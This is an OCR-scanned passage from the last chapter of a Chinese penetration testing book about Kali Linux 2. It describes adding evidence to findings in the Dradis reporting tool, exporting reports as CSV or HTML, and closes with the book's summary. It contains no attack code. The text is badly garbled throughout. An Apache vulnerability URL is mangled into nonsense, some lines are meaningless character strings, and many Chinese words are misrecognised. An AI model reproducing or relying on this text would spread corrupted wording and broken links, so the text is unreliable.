More information on the specific issues affecting this version can be found 
at:- 

http://httpd.apache.org/security/vulnerabilities 22.html 
http://httpd.apache.org/security/vulnerabilities 20.html 


httn://httned anacha nrmn/ecanciirinuihn»ainarahilitiac 12 html 


ÉKl16-16 fEDradis" 2m 5j Issues 
ER TARRA Issues 5h. 44 46 n] EAS AlIssuesof NL Bus 
(Evidence) , 1" 3lhxé Did J4 85H w HERTETESET Rp, mu He 3ÉuE 
明日 标 上 存在 这 个 问题 。 这 一 点 很 容易 实现 ， 单 击 “Evidence” 右 1h] EAT S 
加 按钮 ， 残 可 以 添加 一 个 证 据 ， 如 图 16-17 所 示 。 


us Node properties 


Notes T 


Ei This note doesn't provide a #[Title]# field 


Evidence 


Attachments 


图 16-17 在 Dradis 中 添加 Evidence 


单 击 “+? 投 钮 之 后 ， 束 会 弹出 一 个 证 据 的 添加 界面 ， 如 图 16-18 所 





不 。 
Add evidence 
= M ~ 
| 
E or cance 
16-18 Dradis 中 的 Evidence 操作 界面 
在 编辑 元 


完了 所 有 的 证 乓 之 后 ， 我 们 束 可 以 将 鹿 试 报 各 导出 ， 如 图 


16-19 所 示 。Dradis 中 支持 多 种 格式 的 渗透 测试 报告 ， 可 以 使 用 右上 角 
的 “Export results”。 


个 Upload output from tool B Export results 





图 16-19 ”Dradis 中 提供 的 报告 导出 功能 


非 商 业 版 的 Dradis 支 持 的 报告 格式 比较 少 ， 但 是 里 面包 含 了 常用 的 
CSV 格 式 和 HTML 格 式 ， 如 图 16-20 所 示 。 


Export Manager 


Export results in CSV format | Generate advanced HTML reports Save and restore project information 


Choose a template 


Please choose one of the templates available for this plugin (find them in ./templates/reports/html export ) 


图 default dradis template v3.0.html.erb 
C) basic.html.erb 


图 16-20 ”导出 Dradis 的 报告 


单 击 “Export” 按 钮 可 以 导出 刚才 编写 的 报告 。 


16.7 小 结 


在 这 一 章 中 ， 我 们 介绍 了 渗透 测试 报告 的 编写 规范 及 包含 的 内 容 ， 
并 介绍 了 Kali Linux 2 中 最 为 优秀 的 测试 报告 编写 工具 Dradis 的 使 用 方 
法 。 虽 然 说 渗透 的 过 程 可 能 很 激动 人 心 ， 但 是 最 后 的 成 果 却 要 以 文档 的 
形 却 展示 给 客户 。 如 果 你 和 希望 成 为 一 名 合格 的 渗透 测试 专家 ， 那 么 你 应 
该 具备 优秀 的 报 香 抒写 能 


本 章 是 全 书 的 最 后 部 分 ， 全 书 16 章 内 容 完整 地 介绍 了 渗透 测试 工作 
的 全 部 流程 。 很 感谢 你 阅读 完了 本 书 ， 也 希望 这 本 书 能 带领 你 走 上 渗透 
测试 专家 的 道路 ， 更 好 地 服务 于 我 国 的 网 络 与 信息 安全 事业 。 


